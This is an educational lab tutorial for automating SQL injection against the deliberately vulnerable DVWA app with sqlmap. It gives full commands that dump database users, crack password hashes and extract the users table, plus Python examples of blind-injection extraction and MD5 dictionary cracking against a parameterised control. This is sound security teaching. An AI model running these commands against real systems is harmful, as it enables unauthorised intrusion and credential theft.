Practical Guide – Automate SQL Injection with SqlMap (DVWA): Lesson 7


Section 0. Background Information
  • References
  • Lab Notes
    • In this lab we will do the following:
      1. We will use sqlmap to obtain the following pieces of information:
        1. A list of Database Management Usernames and Passwords.
        2. A list of databases
        3. A list of tables for a specified database
        4. A list of users and passwords for a specified database table.
  • Legal Disclaimer
        This material is intended for educational purposes only.
Section 1. Configure Fedora14 Virtual Machine Settings
  1. Open Your VMware Player
    • Instructions:
      1. On Your Host Computer, Go To
      2. Start –> All Programs –> VMWare –> VMWare Player
  2. Edit Fedora14 Virtual Machine Settings
    • Instructions:
      1. Highlight fedora14
      2. Click Edit virtual machine settings
  3. Edit Network Adapter
    • Instructions:
      1. Highlight Network Adapter
      2. Select Bridged
      3. Click on the OK Button.

Section 2. Login to Fedora14
  1. Start Fedora14 VM Instance
    • Instructions:
      1. Start Up VMWare Player
      2. Select Fedora14
      3. Play virtual machine
  2. Login to Fedora14
    • Instructions:
      1. Login: student
      2. Password: <whatever you set it to>.

Section 3. Open Console Terminal and Retrieve IP Address
  1. Start a Terminal Console
    • Instructions:
      1. Applications –> Terminal
  2. Switch user to root
    • Instructions:
      1. su - root
      2. <Whatever you set the root password to>
  3. Get IP Address
    • Instructions:
      1. ifconfig -a
    • Notes:
      • As indicated below, my IP address is 192.168.1.106.
      • Please record your IP address.

Section 4. Temporarily Disable SELinux and the Firewall
  1. Start a Terminal Console
    • Instructions:
      1. sestatus
      2. If SELinux status: is set to disabled OR if Current mode: is set to permissive, then skip the next steps, and Continue to the Next Section.
      3. If SELinux status: is set to enabled AND if Current mode: is set to enforcing, then Continue the next steps.
    • Notes:
      • In my case, I need to temporarily put selinux in permissive mode to demonstrate basic attacks on DVWA.
  2. Place selinux in permissive mode
    • Instructions:
      1. echo 0 > /selinux/enforce
        • Writing a “0” to the enforce file switches SELinux to permissive mode (the same effect as running setenforce 0). The change does not survive a reboot, which is what we want for a lab.
      2. sestatus
        • Notice that “Current mode:” changed to permissive.
  3. Disable Firewall
    • Instructions:
      1. service iptables save
        • This is not strictly necessary unless you have made recent changes to the firewall; it writes the running rules to /etc/sysconfig/iptables so they can be restored later.
      2. service iptables stop
        • This command flushes the rules and disables the firewall until the next reboot. Only do this because the lab runs on an isolated network.
Section 5. Configure BackTrack Virtual Machine Settings
  1. Open Your VMware Player
    • Instructions:
      1. On Your Host Computer, Go To
      2. Start –> All Programs –> VMWare –> VMWare Player
  2. Edit BackTrack Virtual Machine Settings
    • Instructions:
      1. Highlight BackTrack5R1
      2. Click Edit virtual machine settings
  3. Edit Network Adapter
    • Instructions:
      1. Highlight Network Adapter
      2. Select Bridged
      3. Click on the OK Button.

Section 6. Login to BackTrack
  1. Start BackTrack VM Instance
    • Instructions:
      1. Start Up VMWare Player
      2. Select BackTrack5R1
      3. Play virtual machine
  2. Login to BackTrack
    • Instructions:
      1. Login: root
      2. Password: toor or <whatever you changed it to>.
  3. Bring up the GNOME desktop
    • Instructions:
      1. Type startx

Section 7. Open Console Terminal and Retrieve IP Address
  1. Open a console terminal
    • Instructions:
      1. Click on the console terminal
  2. Get IP Address
    • Instructions:
      1. ifconfig -a
    • Notes:
      • As indicated below, my IP address is 192.168.1.105.
      • Please record your IP address.

Section 8. Login to DVWA
  1. Start Firefox
    • Instructions:
      1. Click on Firefox
  2. Login to DVWA
    • Instructions:
      1. Start up Firefox on BackTrack
      2. Place http://192.168.1.106/dvwa/login.php in the address bar.
        • Replace 192.168.1.106 with Fedora’s IP address obtained in (Section 3, Step 3).
      3. Login: admin
      4. Password: password
      5. Click on Login

Section 9. Set Security Level
  1. Set DVWA Security Level
    • Instructions:
      1. Click on DVWA Security, in the left hand menu.
      2. Select “low”
      3. Click Submit
Section 10. Obtain the PHP Session Cookie
  1. SQL Injection Menu
    • Instructions:
      1. Select “SQL Injection” from the left navigation menu.
  2. Select Tamper Data
    • Instructions:
      1. Tools –> Tamper Data
  3. Start Tamper Data
    • Instructions:
      1. Click on Start Tamper
  4. Basic Injection
    • Instructions:
      1. Input “1” into the text box.
      2. Click Submit.
    • Note:
      • The goal here is to see the GET request that the form sends to the PHP script behind the scenes, including the exact parameter names (id and Submit) that sqlmap needs to target.
      • The page prints a “Surname:” line only when the query returns a row. Later we hand that string to sqlmap (--string) so it can tell a true response from a false one and use the injection to pull database usernames and passwords.
  5. Tamper with request?
    • Instructions:
      1. Make sure the Continue Tampering? checkbox is unchecked.
      2. Then Click Submit
  6. Copying the Referer URL
    • Instructions:
      1. Select the second GET Request
      2. Right Click on the Referer Link
      3. Select Copy
  7. Open Notepad
    • Instructions:
      1. Applications –> Wine –> Programs –> Accessories –> Notepad
  8. Paste Referer URL into Notepad
    • Instructions:
      1. Edit –> Paste
  9. Copying the Cookie Information
    • Instructions:
      1. Right Click on the Cookie line
      2. Select Copy
  10. Pasting the Cookie Information
    • Instructions:
      1. Edit –> Paste
    • Notes:
      • Now you should have copied both the Referer and Cookie lines into Notepad. (See Picture)

Section 11. Using SqlMap to Obtain Current User and Database
  1. Verify sqlmap.py exists
    • Instructions:
      1. cd /pentest/database/sqlmap
      2. ls -l sqlmap.py
  2. Obtain Database User For DVWA
    • Note:
      1. Obtain the Referer URL from (Section 10, Step 10); it goes after the -u flag below.
      2. Obtain the Cookie line from (Section 10, Step 10); it goes after the --cookie flag below. Your PHPSESSID value will differ from the one shown.
    • Instructions:
      1. ./sqlmap.py -u "http://192.168.1.106/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="PHPSESSID=lpb5g4uss9kp70p8jccjeks621; security=low" -b --current-db --current-user
        • -u, Target URL (the id parameter is the injection point)
        • --cookie, HTTP Cookie header. DVWA keeps you logged in through PHPSESSID and reads the security level from the security cookie, so both are needed for sqlmap to reach the low-security code path instead of the login page.
        • -b, Retrieve the DBMS banner (version string)
        • --current-db, Retrieve the database the application is currently using
        • --current-user, Retrieve the DBMS account the application connects as
  3. Do you want to keep testing?
    • Instructions:
      1. Do you want to keep testing the other parameters (if any)? y
      2. Do you want to skip test payloads specific to other DBMSes? y
  4. Viewing Results
    • Instructions:
      1. For DVWA, the current database is “dvwa” and the application connects to MySQL as “root@localhost”. That second result is a finding in its own right: the web application uses the DBMS superuser account, so anything injected through the page runs with every privilege root has. A hardened deployment would give the application a dedicated account limited to the dvwa database.
Section 12. Using SqlMap to Obtain Database Management Username and Password
  • NOTE: You must have completed Lesson 4 to see the db_hacker in Step 2.
  1. Obtain Database Management Username and Password
    • Instructions:
      1. ./sqlmap.py -u "http://192.168.1.106/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="PHPSESSID=lpb5g4uss9kp70p8jccjeks621; security=low" --string="Surname" --users --passwords
        • -u, Target URL
        • --cookie, HTTP Cookie header
        • --string, String that appears in the response only when the injected condition is true (here the “Surname” label DVWA prints for each matching row); sqlmap uses it to distinguish true from false pages in boolean-based blind injection.
        • --users, Enumerate the DBMS users (from mysql.user)
        • --passwords, Enumerate the DBMS users' password hashes (the option is plural in sqlmap); sqlmap then offers to crack them.
  2. Obtain Database Management Username and Password (Part 2)
    • Instructions:
      1. Do you want to perform a dictionary-based attack against the retrieved password hashes? Y
      2. What dictionary do you want to use? <Press Enter> (uses the wordlist shipped with sqlmap)
    • Notes:
      1. Notice that the password for username db_hacker was cracked. The hashes come from mysql.user; MySQL's PASSWORD() hash is an unsalted double SHA-1, so a dictionary attack against it is fast.
  3. Obtain db_hacker Database Privileges
    • Instructions:
      1. ./sqlmap.py -u "http://192.168.1.106/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="PHPSESSID=lpb5g4uss9kp70p8jccjeks621; security=low" -U db_hacker --privileges
        • -u, Target URL
        • --cookie, HTTP Cookie header
        • -U, DBMS user to enumerate
        • --privileges, Enumerate the DBMS user's privileges
  4. View Results: Obtain db_hacker Database Privileges
    • Instructions:
      1. Notice that DBMS user “db_hacker” has administrative privileges, not merely rights on the dvwa database.
      2. Notice that “db_hacker” can log in from any host: the “%” in the host part of the MySQL account name is a wildcard, so the account is not restricted to localhost.
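
The --string="Surname" option above is the whole trick behind boolean-based blind injection: the page prints a “Surname:” line only when the injected WHERE clause is true, so every question sqlmap asks the database is answered one bit at a time by checking for that string. The following is an added example, not code from the original lab or from sqlmap. It models DVWA's low-security query (SELECT first_name, last_name FROM users WHERE user_id = '$id') against an in-memory SQLite table with constructed sample rows, drives the same length-then-character binary search sqlmap performs, and shows that the identical payloads extract nothing once the query is parameterised. The sample rows, the use of SQLite's length, substr and unicode functions and the "-- " comment terminator are assumptions of this example; against MySQL sqlmap would use LENGTH, SUBSTRING and ASCII instead.

```python
import sqlite3

# Constructed stand-in for the dvwa.users table. Column names follow DVWA,
# the rows are made up for this example (the first hash is md5("password")).
SAMPLE_USERS = [
    (1, "admin", "admin", "admin", "5f4dcc3b5aa765d61d8327deb882cf99"),
    (2, "Gordon", "Brown", "gordonb", "e99a18c428cb38d5f260853678922e03"),
]


def build_db():
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (user_id INTEGER, first_name TEXT, "
        "last_name TEXT, user TEXT, password TEXT)"
    )
    conn.executemany("INSERT INTO users VALUES (?, ?, ?, ?, ?)", SAMPLE_USERS)
    return conn


def vulnerable_page(conn, id_param):
    """DVWA 'low' style handler: the id parameter is spliced into the SQL."""
    query = (
        "SELECT first_name, last_name FROM users "
        f"WHERE user_id = '{id_param}'"
    )
    try:
        rows = conn.execute(query).fetchall()
    except sqlite3.Error:
        return "<pre>Error</pre>"  # an error page never contains "Surname"
    return "".join(
        f"<pre>ID: {id_param}<br>First name: {first}<br>Surname: {last}</pre>"
        for first, last in rows
    )


def hardened_page(conn, id_param):
    """Same lookup with a bound parameter: the input can never change the SQL."""
    rows = conn.execute(
        "SELECT first_name, last_name FROM users WHERE user_id = ?", (id_param,)
    ).fetchall()
    return "".join(
        f"<pre>ID: {id_param}<br>First name: {first}<br>Surname: {last}</pre>"
        for first, last in rows
    )


def oracle(page, condition):
    """True iff the page still shows a row once `condition` is ANDed in.

    This is exactly the check that --string "Surname" makes sqlmap perform.
    """
    payload = f"1' AND ({condition})-- "
    return "Surname" in page(payload)


def infer_number(page, expr, max_val):
    """Binary-search the integer value of a SQL expression (~log2(max_val) requests)."""
    low, high = 0, max_val
    while low < high:
        mid = (low + high) // 2
        if oracle(page, f"({expr}) > {mid}"):
            low = mid + 1
        else:
            high = mid
    return low


def extract_string(page, subquery, max_len=64):
    """Leak the scalar result of `subquery`: first its length, then each character."""
    length = infer_number(page, f"length(({subquery}))", max_len)
    chars = []
    for pos in range(1, length + 1):
        code = infer_number(page, f"unicode(substr(({subquery}), {pos}, 1))", 255)
        chars.append(chr(code))
    return "".join(chars)


def demo():
    """Run the same extraction against the vulnerable and the hardened handler."""
    conn = build_db()
    target = "SELECT password FROM users WHERE user = 'admin'"
    return {
        "vulnerable": extract_string(lambda p: vulnerable_page(conn, p), target),
        "hardened": extract_string(lambda p: hardened_page(conn, p), target),
    }


if __name__ == "__main__":
    print(demo())
```

Against the vulnerable handler the 32-character hash comes back after a few hundred true/false probes; against the parameterised handler the length probe never sees a “Surname” and the extraction yields an empty string, which is the behaviour DVWA's higher security levels approximate.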
Section 13. Obtain a list of all Databases
  1. Obtain a list of all databases
    • Note:
      1. Obtain the Referer URL from (Section 10, Step 10); it goes after the -u flag below.
      2. Obtain the Cookie line from (Section 10, Step 10); it goes after the --cookie flag below.
    • Instructions:
      1. ./sqlmap.py -u "http://192.168.1.106/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="PHPSESSID=lpb5g4uss9kp70p8jccjeks621; security=low" --dbs
        • -u, Target URL
        • --cookie, HTTP Cookie header
        • --dbs, Enumerate the DBMS's databases.
  2. Review Results: Obtain a list of all databases
    • Note:
      1. Notice that sqlmap supplies a list of available databases.

Section 14. Obtain “dvwa” tables and contents
  1. Obtain “dvwa” tables and contents
    • Note:
      1. Obtain the Referer URL from (Section 10, Step 10); it goes after the -u flag below.
      2. Obtain the Cookie line from (Section 10, Step 10); it goes after the --cookie flag below.
    • Instructions:
      1. ./sqlmap.py -u "http://192.168.1.106/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="PHPSESSID=lpb5g4uss9kp70p8jccjeks621; security=low" -D dvwa --tables
        • -u, Target URL
        • --cookie, HTTP Cookie header
        • -D, DBMS database to enumerate
        • --tables, Enumerate the database's tables
  2. Viewing “dvwa” tables and content results
    • Note:
      1. Notice sqlmap listed two tables: guestbook and users.
  3. Obtain columns for table dvwa.users
    • Instructions:
      1. ./sqlmap.py -u "http://192.168.1.106/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="PHPSESSID=lpb5g4uss9kp70p8jccjeks621; security=low" -D dvwa -T users --columns
        • -u, Target URL
        • --cookie, HTTP Cookie header
        • -D, DBMS database to enumerate
        • -T, DBMS table to enumerate
        • --columns, Enumerate the table's columns
  4. Viewing Results: columns for table dvwa.users
    • Note:
      1. Notice that there are both a user and password columns in the dvwa.users table.
  5. Obtain Users and their Passwords from table dvwa.users (Part 1)
    • Instructions:
      1. ./sqlmap.py -u "http://192.168.1.106/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="PHPSESSID=lpb5g4uss9kp70p8jccjeks621; security=low" -D dvwa -T users -C user,password --dump
        • -u, Target URL
        • --cookie, HTTP Cookie header
        • -D, DBMS database to enumerate
        • -T, DBMS table to enumerate
        • -C, Comma-separated list of columns to dump (here user and password)
        • --dump, Dump the table's contents
  6. Obtain Users and their Passwords from table dvwa.users (Part 2)
    • Instructions:
      1. Do you want to use the LIKE operator? Y
      2. Recognize possible HASH values? Y
      3. What’s the dictionary location? <Press Enter>
      4. Use common password suffixes? y
  7. Review Results: Users and their Passwords from table dvwa.users
    • Notes:
      1. Notice that sqlmap prints each user's password hash with the cracked plaintext in parentheses. DVWA stores passwords as unsalted MD5, which is why a small dictionary recovers them immediately; a salted, slow hash (bcrypt, scrypt, Argon2) would have left this step with nothing but hashes.
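
The prompts in Steps 6 and 7 are sqlmap's built-in hash cracker at work: it notices that the password column holds 32-character hex strings, treats them as unsalted MD5, and tries a wordlist with optional common suffixes. The following is an added example, not the lab's or sqlmap's own code, that reproduces that stage on a constructed dump. The usernames mirror DVWA's defaults, but the hashes are computed here from made-up plaintexts, and the wordlist, suffix list and the non-MD5 placeholder value are illustrative assumptions. It shows why unsalted MD5 falls in milliseconds, how the suffix rule catches a variant the bare wordlist misses, and that a row whose plaintext is not in the list simply stays uncracked.

```python
import hashlib
import re

MD5_HEX = re.compile(r"^[0-9a-f]{32}$")


def md5_hex(text):
    return hashlib.md5(text.encode()).hexdigest()


# Constructed dump in the shape of `-D dvwa -T users -C user,password --dump`.
# The hashes are generated from sample plaintexts so the example is self-contained.
DUMPED_ROWS = [
    ("admin",   md5_hex("password")),
    ("gordonb", md5_hex("abc123")),
    ("smithy",  md5_hex("password1")),       # only hit through the "1" suffix rule
    ("pablo",   md5_hex("S3cr3t-Phrase")),   # not in the wordlist: stays uncracked
    ("svc",     "$2y$10$placeholder-not-an-md5"),  # constructed non-MD5 value: skipped
]

# Small illustrative wordlist and suffix rules (sqlmap ships a much larger list).
WORDLIST = ["123456", "password", "abc123", "letmein", "qwerty"]
SUFFIXES = ["", "1", "123", "!", "2012"]


def looks_like_md5(value):
    """sqlmap's 'recognize possible hash values' step, reduced to the MD5 case."""
    return bool(MD5_HEX.match(value))


def crack_md5(hashes, wordlist=WORDLIST, suffixes=SUFFIXES):
    """Return {hash: plaintext} for every hash hit by wordlist x suffixes.

    Unsalted MD5 means one digest per candidate serves every target at once;
    a per-user salt would force the whole loop to run once per row.
    """
    targets = {h for h in hashes if looks_like_md5(h)}
    found = {}
    for word in wordlist:
        for suffix in suffixes:
            candidate = word + suffix
            digest = md5_hex(candidate)
            if digest in targets:
                found[digest] = candidate
    return found


def crack_dump(rows):
    """Map each dumped user to its recovered password (None if not cracked)."""
    found = crack_md5([h for _, h in rows])
    return {user: found.get(h) for user, h in rows}


if __name__ == "__main__":
    for user, plain in crack_dump(DUMPED_ROWS).items():
        print(f"{user:8} {plain if plain else '<not cracked>'}")
```

With the constructed rows, admin, gordonb and smithy come back in plaintext, pablo stays a bare hash, and the svc value is never tried because it does not look like MD5; that is the same outcome pattern you see in sqlmap's dump table.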

Section 15. Proof of Lab Using John the Ripper
  1. Proof of Lab
    • Instructions:
      1. Bring up a new terminal, see (Section 7, Step 1)
      2. cd /pentest/database/sqlmap
      3. find output/* -print | xargs ls -l
      4. date
      5. echo “Your Name”
        • Replace the string “Your Name” with your actual name.
        • e.g., echo “John Gray”
    • Proof of Lab Instructions:
      1. Do a <PrtScn>
      2. Paste into a word document
      3. Email 2 CSIRT247@Gmail.Com
